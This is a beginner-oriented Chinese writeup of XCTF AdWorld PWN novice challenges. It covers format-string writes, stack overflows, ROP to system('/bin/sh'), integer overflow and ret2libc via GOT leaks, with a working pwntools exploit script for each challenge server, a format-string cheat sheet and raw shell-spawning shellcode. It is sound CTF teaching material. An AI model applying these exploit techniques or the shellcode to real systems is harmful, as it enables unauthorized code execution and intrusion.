<!--
攻防世界 PWN 新手区 Writeup *萌新向*
咕咕咕，咕咕咕咕咕咕，咕咕咕咕咕咕咕咕咕
1572752708
-->

咕咕咕，咕咕咕咕咕咕，咕咕咕咕咕咕。

咕咕咕咕咕咕咕咕咕，咕咕咕咕咕，咕咕咕咕。

咕咕，咕咕咕咕咕咕咕咕咕咕咕，咕咕咕咕咕咕咕咕咕咕咕咕咕咕咕咕。

所需工具：

> [Pwndocker](https://github.com/0xTac/Pwndocker)
> 老 (I) 女 (D) 人 (A)

题目地址:

https://adworld.xctf.org.cn/task/task_list?type=pwn&number=2&grade=0&page=1

## get_shell

> 运行就能拿到 shell 呢，真的

我信了

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/QM2G1keXcPWfSVb.png)

IDA 一看，简单粗暴。直接用 nc 连上服务器即可，一道让人掌握如何使用 nc 的题目？

```
nc serverip port
cat flag
```

## CGfsb

> 菜鸡面对着 pringf 发愁，他不知道 prinf 除了输出还有什么作用

先看保护状态

```
[*] '/ctf/work/adworld/CGfsb/4a0c08abff9d43ba8b65718a0edc7cc2'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
```

32 位程序，没有开 PIE 地址随机化。

使用 IDA 粗略查看代码逻辑

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/21ODKXzHJYs7lZx.png)

发现程序里面有 `cat flag` 的操作，我们只需要运行到这个位置即可，但是在程序运行的上下文都没有对 pwnme 修改赋值的地方

但是，看到上面有一条 `printf(&s)` 的语句，可以知道这里应该需要用到 **格式化字符漏洞**

存在这个格式化字符漏洞的情况下，我们可以实现 **任意地址读** 以及 **任意地址写**

详细的介绍可以参考：[[原创]格式化字符串漏洞简介-『Pwn』-看雪安全论坛](https://bbs.pediy.com/thread-253638.htm)

这里快速摘抄经典表格，参考实际用法使用即可。

```
32位

读
'%{}$x'.format(index)           // 读4个字节
'%{}$p'.format(index)           // 同上面
'${}$s'.format(index)

写
'%{}$n'.format(index)           // 解引用，写入四个字节
'%{}$hn'.format(index)          // 解引用，写入两个字节
'%{}$hhn'.format(index)         // 解引用，写入一个字节
'%{}$lln'.format(index)         // 解引用，写入八个字节

64位

读
'%{}$x'.format(index, num)      // 读4个字节
'%{}$lx'.format(index, num)     // 读8个字节
'%{}$p'.format(index)           // 读8个字节
'${}$s'.format(index)

写
'%{}$n'.format(index)           // 解引用，写入四个字节
'%{}$hn'.format(index)          // 解引用，写入两个字节
'%{}$hhn'.format(index)         // 解引用，写入一个字节
'%{}$lln'.format(index)         // 解引用，写入八个字节

%1$lx: RSI
%2$lx: RDX
%3$lx: RCX
%4$lx: R8
%5$lx: R9
%6$lx: 栈上的第一个QWORD
```

言归正传，那么首先我们需要知道输入的偏移量。

通过输入 `aaaa-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x`，`aaaa` 是我们输入的一般字符，`%x` 的意思是输出该位置的十六进制数

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/CIPctdHXfJbmrga.png)

根据程序输出，我们可以知道偏移量为 10 的地址上存储了我们所输入的信息，将来就把内存地址放在这个位置即可。

接下来我们来找 pwnme 在内存中的位置，由于没有开启 PIE ，因此内存地址不会变化的，在 IDA 中双击 `pwnme` 这个变量即可。

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/G9lnxiodye8qDH4.png)

可以知道 pwnme 在内存中的地址为 `0x0804A068`

因此，我们可以构造出我们这次格式化漏洞的攻击代码：`p32(0x0804A068) + aaaa%10$n`

这样我们就把 0x0804A068 设置成了 8

那么，为什么是 8 呢？

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/Cmc7B8zRhT1I9X5.png)

程序会将 `%10$n` 之前字符的个数写入到指定内存中，因此前面我们构造八个字符即可。

这里除了 `p32(0x0804A068) + aaaa%10$n` 这种形式我们也可以使用 `p32(0x0804A068) + '%4c%10$n` 能同样的达到效果

```python
#!/usr/bin/env python

from pwn import *

proc = './4a0c08abff9d43ba8b65718a0edc7cc2'

context.binary = proc
context.log_level = 'debug'

if args.R:
    p = remote('111.198.29.45', 38981)
else:
    p = process(proc)

pwnme = 0x0804A068

p.sendlineafter(':', 'imlonghao')
p.sendlineafter(':', p32(pwnme) + '%4c%10$n')

p.interactive()
```

## when_did_you_born

> 只要知道你的年龄就能获得 flag，但菜鸡发现无论如何输入都不正确，怎么办

```
[*] '/ctf/work/adworld/when_did_you_born5/002de4a1cad84b0b8988bc3c42e1f007'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
```

拿到题目先看 checksec，开了 Canary，也开了 NX，<del>问题不大</del>。接下来看一下程序逻辑

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/KNf7CEOnziP5xaI.png)

可以在程序中看到 `gets(&v4)`，这就是本题的漏洞点了，`gets` 没有指定接受多少位，因此这里可以实现溢出。

接着我们来看 v4 和 v5 这两个变量在堆栈中的位置和长度

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/PBpChU5d2Z6xqLu.png)

可以知道 v4 的长度为 8 ，并且在内存中的地址比 v5 的高，堆从高地址向低地址生长，因此可以通过 v4 覆盖到 v5。

程序没有修改 return addr 因此不会触发 Canary 保护；程序内部本身就有 `cat flag` 的语句，因此开了 NX 也不会造成影响。

```python
#!/usr/bin/env python

from pwn import *

proc = './002de4a1cad84b0b8988bc3c42e1f007'

context.binary = proc
context.log_level = 'debug'

if args.R:
    p = remote('111.198.29.45', 59375)
else:
    p = process(proc)

p.sendlineafter('?', '2333')
p.sendlineafter('?', 'a' * 8 + p32(1926))

p.interactive()
```

## hello_pwn

> pwn！，segment fault！菜鸡陷入了深思

```
[*] '/ctf/work/adworld/hello_pwn/d50dee8a01694e9fbfe58ddcba84956a'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
```

保护只开了 NX ，其他啥都没开。

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/eYsET3aJfctv8lM.png)

看了看程序的主要逻辑，首先读取 0x10 个字节放到 `unk_601068` 的位置上，接着判断 `dword_60106C`是否等于 `1853186401` ，如果等于，则我们可以拿到 flag

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/RcBMU1wiJoStlpz.png)

接着看 `unk_601068` 和 `dword_60106C` 的位置和大小，`unk_601068` 只有 4 位，我们可以通过溢出覆盖下面的 `dword_60106C`，这样我们就能使程序逻辑运行到 getflag 的函数了。

```python
#!/usr/bin/env python

from pwn import *

proc = './d50dee8a01694e9fbfe58ddcba84956a'

context.binary = proc
context.log_level = 'debug'

if args.R:
    p = remote('111.198.29.45', 39742)
else:
    p = process(proc)

p.sendlineafter('bof', '2333' + p32(1853186401))

p.interactive()
```

## level0

> 菜鸡了解了什么是溢出，他相信自己能得到 shell

```
[*] '/ctf/work/adworld/level0/ea3758e885904101913f7be6fff1bb2d'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
```

和上一题一样只开了 NX，其他保护都没开

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/JCHUkhD4TO83wSF.png)

程序的漏洞点是 `vulnerable_function` 函数，读取了 0x200 字节，但是 buf 只有 0x80 的位置，加上没有 Canary 保护，我们可以通过溢出修改程序的返回地址。

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/bMSYl8xFQyK1kpD.png)

程序自带了 `system("/bin/sh")` 函数，我们只需要将返回地址修改到这里即可，这里的地址是 `0x400596`

接下来我们确定长度，看一下布局

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/YSydrHFqWjczoUn.png)

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/glFGZNB1VkzRdLp.png)

因此长度确定为 `0x80+0x8=136`，然后传返回地址即可。

除了上面的方法，我们还可以利用 cyclic 和 gdb 来进行调试。

首先通过 `cyclic 300` 生成一长串字符，用户确定溢出位置；接着通过 `gdb -q program_name` 启动 gdb，随后使用 run 启动程序

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/4ZMnVw8g1hmxaLq.png)

接着将那一长串字符复制粘贴到程序中，回车

程序会崩溃，gdb 会返回当前的寄存器信息

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/nTKD78iQGmygpVO.png)

看到 RSP 是 `jaab` ，通过 `cyclic -l jaab` 确定长度是 136，和上面的是一样的。

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/KbM6STOUjhas7iW.png)

栈的结构大致如图

```python
#!/usr/bin/env python

from pwn import *

proc = './ea3758e885904101913f7be6fff1bb2d'

context.binary = proc
context.log_level = 'debug'

if args.R:
    p = remote('111.198.29.45', 40355)
else:
    p = process(proc)

callsystem = 0x400596

p.sendlineafter('World', 'a' * 136 + p64(callsystem))

p.interactive()
```

## level2

> 菜鸡请教大神如何获得 flag，大神告诉他‘使用`面向返回的编程`(ROP)就可以了’

```
[*] '/ctf/work/adworld/level2/1eeba7bd29854274886837bead29fa75'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
```

这题和上一题解题的思路基本一致，区别就是没有了自带的 getshell 函数，另外变成了 32 位的程序。

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/hDc3W7VlXpJRgi2.png)

漏洞点基本上一致，就是栈溢出。

现在的问题就是，我们需要自己构建通过 system 函数来运行 /bin/sh

看到上面的漏洞函数，使用了 system 函数，这对我们构建来说就更简单了，加上没有 PIE，只需要找到 system 的地址即可直接使用

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/CkwK74EqdcsBI3D.png)

双击 IDA 中的 \_system 函数，即可知道他的地址

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/8de1KPwxQsDH6pm.png)

即知道了 system 的地址为 `0x8048320`

接下来看程序里面有没有自带的 `/bin/sh` 字符串，没有的话我们就需要自己传进去程序了，IDA 中通过 `Ctrl+F12` 可以查看所有的字符串

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/RVLgGPFA7NktZJ3.png)

十分幸运的是，程序里面有 `/bin/sh` 字符串。

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/MopS4qBY3Cvze1h.png)

`/bin/sh` 的地址是 `0x804A024`，这样两个条件我们都有了，就可以构造攻击字符串了

首先确认输入多少才能溢出到返回函数

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/C49LHGSRoEVefui.png)

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/zAZhM2tWwf3cs9d.png)

即需要 `0x88+0x4=140` 个字符才能覆盖到返回函数

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/bmN7GXx8oIMZcri.png)

栈大致如上图，`return_addr` 为当前函数的返回地址，`return_addr2` 为运行完返回函数后的返回地址，`args` 为 `return_addr` 函数需要的参数。

在本题的话，`return_addr` 为 `0x8048320`，`return_addr2` 随便填写就好了，`args` 为 `/bin/sh` 所在的地址即 `0x804A024`

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/D2u6RXQmxK3FS9k.png)

最终栈如上图所示，代码如下

```python
#!/usr/bin/env python

from pwn import *

proc = './1eeba7bd29854274886837bead29fa75'

context.binary = proc
context.log_level = 'debug'

if args.R:
    p = remote('111.198.29.45', 56526)
else:
    p = process(proc)

system = 0x8048320
binsh = 0x804A024

p.sendlineafter(':', 'a' * 140 + p32(system) + p32(0) + p32(binsh))

p.interactive()
```

## string

> 菜鸡遇到了 Dragon，有一位巫师可以帮助他逃离危险，但似乎需要一些要求

```
[*] '/ctf/work/adworld/string/79fce6e54bca4825bb65611b55b294a1'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
```

这题就有点不同了，除了 PIE 没开其他保护都开了，另外本题的没用的字也太多了...

通过 IDA 每个函数都看一看，不难发现在 `sub_400BB9` 函数中存在格式化字符漏洞

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/D2u6RXQmxK3FS9k.png)

另外在 `sub_400CA6` 函数中，直接将我们的输入运行了

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/8Mvn2BNAslUIPFQ.png)

但是，这里就有一个问题了，在这个函数中需要 `*a1 == a1[1]` 才会执行我们的 shellcode，那么，我们先来搞清楚这个 a1 是什么吧。

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/2vR13CLVUmQpuOa.png)

相信通过上面的图，a1 是上面的这个问题就已经很清晰了。

在 main 函数里面定义了，\*a1 就是 68，a1[1] 就是 85，那么这里就可以通过格式化字符漏洞来解题了，修改其中一个值使其与另外一个值相等即可。

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/HqYUuNFs4wTtCbx.png)

利用格式化字符漏洞的话，我们有两种可行的方法，一种是将目标地址放在上图中的 `&v2`，另外一种是直接放入 `&format` 中

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/Sm9oAbzeMGBvnZw.png)

放在 `&v2`的话偏移值就是 7，放在 `&format` 的话偏移值就是 8

偏移值确定好了，那么地址是什么呢？

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/QDX4w8J6xkWC2Iz.png)

其实根据 IDA 的 main 函数就能看出来，程序一开始为了降低难度就已经输出了相关的地址，本文中选用 `secret[0]` 即 `*a1` 以及 `&format` 的偏移来解题

即我们需要在 `Give me an address` 中输入 `secret[0]` 的值，在 `Your wish is`中输入 `'%85c%7$n` 来实现任意地址写的操作。

接下来问题基本上就解决了，最后他需要运行一个 shellcode ，我们可以在网上随便找一个 64 位的执行 /bin/sh 的 shellcode 即可

```python
#!/usr/bin/env python

from pwn import *

proc = './79fce6e54bca4825bb65611b55b294a1'

context.binary = proc
context.log_level = 'debug'

if args.R:
    p = remote('111.198.29.45', 55672)
else:
    p = process(proc)

shellcode = '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'

p.recvuntil('secret[0] is ')
address = int('0x' + p.recvuntil('\n').strip(), 16)

p.sendlineafter('name be:', 'imlonghao')
p.sendlineafter('So, where you will go?east or up?:', 'east')
p.sendlineafter('go into there(1), or leave(0)?:', '1')
p.sendlineafter('Give me an address', str(address))
p.sendlineafter('And, you wish is:', '%85c%7$n')
p.sendlineafter('Wizard: I will help you! USE YOU SPELL', shellcode)

p.interactive()
```

## guess_num

> 菜鸡在玩一个猜数字的游戏，但他无论如何都银不了，你能帮助他么

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/kEqG8RzZmI1nPV4.png)

（出题人出题也要夹私货）

```
[*] '/ctf/work/adworld/guess_num/8148f1ab15f24bacbe1b16e8de24df17'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
```

保护全开的题目

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/ejLgWSbIGCtU4JM.png)

通过 main 函数可以看到有两个问题，一个是使用了 `gets` 存在栈溢出，另一个是使用了 `srand` 初始化随机数种子

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/muF1qdoMBWejcAR.png)

`srand` 进行初始化的时候，是通过 `sub_BB0` 函数初始化的，而该函数使用了 `/dev/urandom` 来取得随机数的。

那么，我们能不能通过 `gets` 的溢出固定这个随机数呢？答案是可以的。

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/5E3RCkBSA42J1Zf.png)

当 `gets` 超过 0x20 字符时就会溢出开始覆盖 seed 的值，我们可以通过栈溢出固定下来随机数的种子数。

本题本质时一个猜数字的游戏，连续猜中 10 次就能得到 flag 了。我们可以通过写一个简单的 C 程序来提前取得要猜的数字，固定随机数的种子数为 0

```c
void main() {
        int i;
        srand(0);
        for (i = 0; i <= 9; ++i) {
                printf("%d", rand()%6+1);
        }
}
```

编译运行，可以知道这 10 个要猜的数字分别是：2 5 4 2 6 2 5 1 4 2

```python
#!/usr/bin/env python

from pwn import *

proc = './8148f1ab15f24bacbe1b16e8de24df17'

context.binary = proc
context.log_level = 'debug'

if args.R:
    p = remote('111.198.29.45', 57416)
else:
    p = process(proc)

p.sendlineafter(':', 'a'*0x20 + p64(0))
p.sendlineafter(':', '2')
p.sendlineafter(':', '5')
p.sendlineafter(':', '4')
p.sendlineafter(':', '2')
p.sendlineafter(':', '6')
p.sendlineafter(':', '2')
p.sendlineafter(':', '5')
p.sendlineafter(':', '1')
p.sendlineafter(':', '4')
p.sendlineafter(':', '2')

p.interactive()
```

## int_overflow

> 菜鸡感觉这题似乎没有办法溢出，真的么?

```
[*] '/ctf/work/adworld/int_overflow/532be1161263482890e88772bcde6470'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
```

逐个函数检查一下看看有没有问题

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/zmcp4duJi2SvVkA.png)

login 函数没有问题，read 进来的值小于申请的值。

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/u14wkhSJXaBPLeN.png)

看到 check_passwd 的时候就发现问题了，其中使用了 strcpy 函数，将 s 复制到 dest，而 dest 的大小只有 11

而表示 s 长度的 v3 变量，类型是一个 int8，而 int8 的大小范围是 -128~127，也就是说，我们可以通过上溢 v3 绕过长度限制，从而通过 strcpy 来栈溢出覆盖返回地址实现攻击

v3 要求在 [4, 8] 之间，通过上溢的话 `127+128+4=259` 以及 `127+128+8=263` ，我们需要构建 payload 的长度在这个范围 [259, 263] 内即可通过长度校验

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/5xCe1zHZtcTE6fU.png)

函数中有现成的后门，直接将返回地址设置成这个函数的即可，这里的地址是 `0x0804868B`

接下来确定输出多少位能覆盖到返回地址

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/wo9KdzQrHnXYjh8.png)

根据上图可以知道，是 `0x14+0x4=0x18`

最终，我们能够写出以下脚本实现攻击，我使用了 `ljust` 来凑够 259 位的长度

```python
#!/usr/bin/env python

from pwn import *

proc = './532be1161263482890e88772bcde6470'

context.binary = proc
context.log_level = 'debug'

if args.R:
    p = remote('111.198.29.45', 39249)
else:
    p = process(proc)

p.sendlineafter(':', '1')
p.sendlineafter(':', 'imlonghao')
p.sendlineafter(':', ('a'*0x18 + p32(0x0804868B)).ljust(259))

p.interactive()
```

## cgpwn2

> 菜鸡认为自己需要一个字符串

```
[*] '/ctf/work/adworld/cgpwn2/441cb6426ac744208071077728a09786'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
```

保护只开了 NX

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/BAT5KaoxqEzgYDb.png)

通过 IDA 检查程序，程序使用了 gets 函数，存在栈溢出漏洞。

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/DzU1PB8saAjgSYX.png)

继续检查，可以发现程序使用了 system 函数，但是没有直接给我们 /bin/sh

这样的话，我的思路就是调用他的 system，再加上自己填进去的 /bin/sh 拿到 shell

首先确定 system 的地址，双击 pwn 函数中的 `_system`

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/zL6xn4DAIEuXdlb.png)

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/3lvmdGMI5jH8UVR.png)

可以知道 system 的地址是 `0x8048420`

然后，我们去哪里写 `/bin/sh` 呢？回到 hello 函数，发现在 gets 的上面通过 fgets 函数读取了我们的名字，并且保存在了 bss 段中

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/z7rgUQajZT8JksP.png)

那么，我们在名字处填写 `/bin/sh` 的话，就保存在了 `0x804A080` 这个地址上，加上程序没有开 PIE 保护，一切就水到渠成了。

通过 `gets(&s)` 的栈溢出覆盖返回地址，手动调用 system 和传参。

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/Vv37trn9icEhPQC.png)

根据 IDA 目测计算可以知道(也可以使用 cyclic + gdb 进行计算)，传入 `0x26+0x4=42` 个字符刚好可以覆盖到返回地址上，构建这样的栈

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/A7gIYuJpE1m9lty.png)

```python
#!/usr/bin/env python

from pwn import *

proc = './441cb6426ac744208071077728a09786'

context.binary = proc
context.log_level = 'debug'

if args.R:
    p = remote('111.198.29.45', 33207)
else:
    p = process(proc)

system = 0x8048420
binsh = 0x804A080

p.sendlineafter('please tell me your name', '/bin/sh')
p.sendlineafter('hello,you can leave some message here:', 'a' * 42 + p32(system) + p32(0) + p32(binsh))

p.interactive()
```

## level3

> libc!libc!这次没有 system，你能帮菜鸡解决这个难题么?

这次的题目不仅给出了二进制文件，还给了 libc.so，通常这种题目，就是要通过泄露相关函数的地址，计算出 libc 的基地址，再通过 libc 取得其他函数的地址来解题。

这里就需要知道 plt 和 got 这两个表了，这里简单带过一下，可以参考 [彻底搞清楚 GOT 和 PLT - 简书](https://www.jianshu.com/p/5092d6d5caa3)。摘录一部分:

> .got
> GOT（Global Offset Table）全局偏移表。这是「链接器」为「外部符号」填充的实际偏移表。
>
> .plt
> PLT（Procedure Linkage Table）程序链接表。它有两个功能，要么在 .got.plt 节中拿到地址，并跳转。要么当 .got.plt 没有所需地址的时，触发「链接器」去找到所需地址
>
> .got.plt
> 这个是 GOT 专门为 PLT 专门准备的节。说白了，.got.plt 中的值是 GOT 的一部分。它包含上述 PLT 表所需地址（已经找到的和需要去触发的）

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/3r2ImcUnB87Jgvz.png)

在实际的题目当中，常用的手法就是调用 plt 表中的类似 puts / write 等函数，输出程序中对应函数在 got 表中的地址，从而通过计算可以得到其他库的函数在本程序中的地址。

```
[*] '/ctf/work/adworld/level3/level3'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
```

保护只开了 NX，没有开其他保护。

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/RuF7ATMCitxjeS3.png)

在漏洞函数中可以看到这里存在一个栈溢出漏洞，那么常规的做法就是看看有没有后门函数可以跳过去，或者利用 system 函数拿到 shell。

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/sOSDQuGzWKI85aV.png)

但在这题中，即没有后门函数，又没有利用到 system 函数，我们不能直接拿其地址作为返回地址。

那么这时候，我们可以利用 write 函数输出 write 函数在 GOT 表中的地址，再利用 libc.so 中 write 函数和 system 函数的地址差值得到 system 函数的地址，是一个十分巧妙的方法。

首先我们先通过 libc.so 拿到相关的地址

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/xLjKrg6nzHGpVci.png)

如图所示，write 函数的地址为 `0xd43c0`，system 函数的地址为 `0x3a940`，在 pwntools 中其实可以通过 `libc.symbols['write']` 和 `libc.symbols['system']` ，并没有太大的必要来人工拿地址

接着，我们需要拿到 libc.so 中 `/bin/sh` 的地址

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/8GtPR3myCHJI7X9.png)

可知，`/bin/sh` 的地址在 1413163 的位置

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/Rn7OFA5S3CdDwc6.png)

如图，我们需要构造 `0x88+4=140` 的字符，然后就能覆盖到返回地址，那么，我们这里什么作为返回地址呢?

我们可以将 write 函数的地址作为返回地址，构造函数使其输出 write 函数在 GOT 表中的地址，接着将返回地址设置为程序头，重新运行一次程序，接着就可以构造 `system("/bin/sh")` 拿到 shell 了。

![](https://cdn.jsdelivr.net/gh/imlonghao/bi@0.55/leaLmDjw5iTbUcI.png)

栈结构大致如上图所示，通过此步我们可以通过计算拿到 libc 中 system 和 /bin/sh 的地址，至于为什么要这样子构造，主要是由于 write 函数需要接收参数而定的

`ssize_t write(int fd, const void *buf, size_t n)`

我们相当于是令 `fd = 1 / *buf = write_addr / n = 4` （如果是 64 位程序的话 n 为 8）然后执行了一次 write 函数，拿到了其地址。

在下一次程序的运行过程中，我们使用同样的栈溢出，即可拿到 shell

```python
#!/usr/bin/env python

from pwn import *
from LibcSearcher import *

proc = './level3'

context.binary = proc
context.log_level = 'debug'

if args.R:
    p = remote('111.198.29.45', 56376)
else:
    p = process(proc)

libc = ELF('./libc_32.so.6')
elf = ELF(proc)

write_plt = elf.plt['write']
write_got = elf.got['write']
vuln_func = elf.symbols['vulnerable_function']

p.recvuntil(':')
p.sendline('a' * 140 + p32(write_plt) + p32(vuln_func) + p32(1) + p32(write_got) + p32(4))

p.recv() # 0a
write_addr = u32(p.recvuntil(':')[:4])

libc_base = write_addr - libc.symbols['write']
system = libc_base + libc.symbols['system']
binsh = libc_base + 0x15902b

p.sendline('a' * 140 + p32(system) + p32(0) + p32(binsh))

p.interactive()
```

## 写在最后

本人 pwn 新手，因此本文多多少少会有点问题，请师傅们指正。
